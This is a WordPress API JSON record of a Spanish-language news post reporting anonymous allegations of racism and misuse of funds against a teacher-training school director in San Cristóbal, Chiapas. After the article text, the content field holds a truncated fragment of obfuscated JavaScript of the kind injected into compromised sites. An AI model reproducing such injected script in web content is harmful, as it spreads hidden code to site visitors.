{"id":9031,"date":"2023-03-13T03:41:32","date_gmt":"2023-03-13T03:41:32","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=9031"},"modified":"2023-03-13T03:41:33","modified_gmt":"2023-03-13T03:41:33","slug":"senalan-de-racismo-a-la-directora-de-la-escuela-normal-larrainzar-de-san-cristobal","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=9031","title":{"rendered":"Se\u00f1alan de racismo a la directora de la Escuela normal Larrainzar de San Crist\u00f3bal"},"content":{"rendered":"\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"756\" height=\"402\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-12-at-1.06.19-PM.jpeg\" alt=\"\" class=\"wp-image-9032\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-12-at-1.06.19-PM.jpeg 756w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-12-at-1.06.19-PM-300x160.jpeg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2023\/03\/WhatsApp-Image-2023-03-12-at-1.06.19-PM-310x165.jpeg 310w\" sizes=\"auto, (max-width: 756px) 100vw, 756px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Estudiantes y docentes, que por temor a represalias pidieron guardar su identidad, se\u00f1alaron de actos de racismo y discriminaci\u00f3n a la Directora de la Escuela Normal &#8220;Lic. Manuel Larrainzar&#8221;, de San Crist\u00f3bal, Onelia Hern\u00e1ndez Torres, as\u00ed como de presuntos desv\u00edos de recursos designados por el gobierno federal. De acuerdo a la informaci\u00f3n compartida, tras la llegada de la actual rectora en el 2022, se mostr\u00f3 como docente respetuoso, pero a lo largo del cargo, comenz\u00f3 con se\u00f1alamientos en contra de alumnos que por las irregularidades comenzaron ha hacerle se\u00f1alamientos y cuestionamientos, incluso, algunos que se revelaron por las cuotas de reinscripci\u00f3n.Detallan que tres meses bastaron para que Onelia Hern\u00e1ndez, se mostrar\u00e1 realmente en contra de los m\u00e1s de 120 j\u00f3venes originarios de municipios y comunidades ind\u00edgenas de la regi\u00f3n, que d\u00eda con d\u00eda, buscan la forma de sufragar sus gastos estudiantiles, y del cual ha sido observado por la actual directora con actos racistas y discriminatorios.De una amplia charla, explicaron como en el semestre actual, les intentaron cobrar la cantidad de mil 100 pesos, pero tras movilizaciones de los j\u00f3venes, hicieron dep\u00f3sitos de 700, recurso que ignora en qu\u00e9 se est\u00e1 utilizando, pues solamente notan como casi todos los d\u00edas viajan de comisi\u00f3n a Tuxtla Guti\u00e9rrez.En esta primera entrega, agregamos que Rodrigo Benjam\u00edn San Crist\u00f3bal, al notar irregularidades en esta instituci\u00f3n como la falsificaci\u00f3n de su firma, se retir\u00f3 del cargo, e incluso se sabe, existe una denuncia ante la fiscal\u00eda de justicia, para evitar ser c\u00f3mplice de recursos mal ejercidos en esta instituci\u00f3n.Solo en lo que va en la administraci\u00f3n de Onelia Hern\u00e1ndez se han remodelado dos veces los ba\u00f1os, que suponen son innecesarios, y que se ha invertido en cada caso m\u00e1s de 600 mil pesos, recursos provenientes de la federaci\u00f3n, \u201cdonde solo han pintado y hecho cambios menores, reh\u00fasan lo mismo, y cuando lo \u00fanico que si urg\u00eda era el cambio de puertas\u201dUrgen a las autoridades educativas, intervengan e investiguen, incluso realicen una auditor\u00eda a esta instituci\u00f3n, para que se aclare los gastos en la remodelaci\u00f3n de la biblioteca virtual, la adquisici\u00f3n de muebles, entre otros trabajos como la construcci\u00f3n de una cisterna que no se sabe ni donde est\u00e1 ubicada.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez\/CorresponsalSan Crist\u00f3bal de Las Casas.- Estudiantes y docentes, que por temor a represalias pidieron guardar su identidad, se\u00f1alaron de actos de racismo y discriminaci\u00f3n a la Directora de la Escuela Normal &#8220;Lic. Manuel Larrainzar&#8221;, de San Crist\u00f3bal, Onelia Hern\u00e1ndez Torres, as\u00ed como de presuntos desv\u00edos de recursos designados por el gobierno federal. De acuerdo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":9032,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-9031","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9031","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=9031"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9031\/revisions"}],"predecessor-version":[{"id":9033,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/9031\/revisions\/9033"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/9032"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=9031"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=9031"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=9031"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}